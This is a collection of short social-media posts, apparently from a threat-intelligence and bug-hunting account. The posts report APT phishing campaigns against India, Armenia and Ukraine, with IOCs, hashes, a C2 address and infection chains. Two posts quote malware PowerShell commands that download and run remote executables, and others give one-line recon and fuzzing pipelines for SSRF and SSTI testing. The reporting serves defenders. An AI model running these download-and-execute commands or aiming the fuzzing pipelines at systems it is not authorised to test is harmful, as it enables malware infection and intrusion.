It is estimated to be an attack targeting India. The content of the malicious DOCM document is the mathematics, science and technology content of the University of Madrid in India.The VBA code will be executed when opened, and the bin file is embedded in the document. CrimsonRAT

Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: https://t.co/0NhDIqAr4U and here https://t.co/pWZ8cC7azy) (1 of 5)

@HaoZhixiang @Kornelij @N_Babajanyan thank you for pointing us to this, we've done some additional research and will release more details soon

@Kornelij @N_Babajanyan Hi, I have found the files downloaded by the dead C2, as well as the ps1 and dll files. download url: https://t.co/ES6y91ZfTO

APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia，There is vba macro code powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe

Received manufacturer reward bounty yesterday

Web security, bug hunting and sharing of online monitoring methods for subdomain takeover. Can also detect malicious IOC indicators https://t.co/trKR5XeBpt

APT Gamaredon The content of the document is a forged document of "Electronic Trust Service of the Shastinska Regional Electricity Administration of Ukraine" наказ_в_дпов_дальної особи.doc http]://principles67.vilitord.ru/BUDGET/stoppage56/rejoice/already[.]mkv can't access

Bitter APT Attack sample，The bait is a chm file, the content is to let everyone report crimes using the Internet chm->cmd->powershell->schtasks->dowwnload jpg->exec command Guess the collection target in the early stage, and then accurately change the pic.jpg command control

c2:207.180.194.63 http[:]//createdaliyplan.serveftp.com:8080/user_details

SideCopy APT attacks on the side, China and the United States are currently conducting trade negotiations, using trade between China and the United States as a bait to attack. cmd->mshta->bat->reg->cdrzip.exe->DLL Side-Loading->c2 attack history https://t.co/cSCs6XNK16

The two commands help you complete sensitive information mining, which is suitable for large-scale batch methods. gau https://t.co/j12Zbrfce8 --subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt ffuf -w urls.txt:HFUZZ -u HFUZZ -replay-proxy http://burpip:port

这个👆🏻图做的挺可爱，盗图一张

https://t.co/86qTmiJQhl

One command to get ssrf mining gau --subs https://t.co/J6ACcAEAOJ | gf ssrf | sort -u | httpx -mc 200 | qsreplace "burpcollaborator" >> ssrfuzzxxx.txt; ffuf -c -w ssrfuzzxxx.txt -u FUZZ happy hunting everyone😄 @0x_rood @Rhynorater @zseano @h1Disclosed @h4x0r_dz @nav1n0x

VT 0

md5:d74088ca99c5f2834e945e2330729d4c alg.exe 551c155f4fce82bba4cc92e56f1ecb84

Recently, some security personnel released samples of North Korean APT organizations, and took a brief look. chm->wscript->jse->reg->cmd->powershell->download malware PE cmd /c powershell iwr -outf %tmp%\alg.exe https://jutise[.]fun/aypbr & start %tmp%\alg.exe

Web vulnerability mining SSTI vulnerability sudo waybackurls https://t.co/jQ7t8bcgds|grep -Ev "\.(jpeg|jpg|png|ico|js|css|svg|ttf|eot|woff|webp)$" | qsreplace "ssti{{9*9}}" > fuzz.txt for url in $(cat fuzz.txt); do python3 https://t.co/1f1XFUaCfA -u $url; print $url; done

more parameters return_path|next_url|checkout_urlretURL|link|file|fallback|callback_url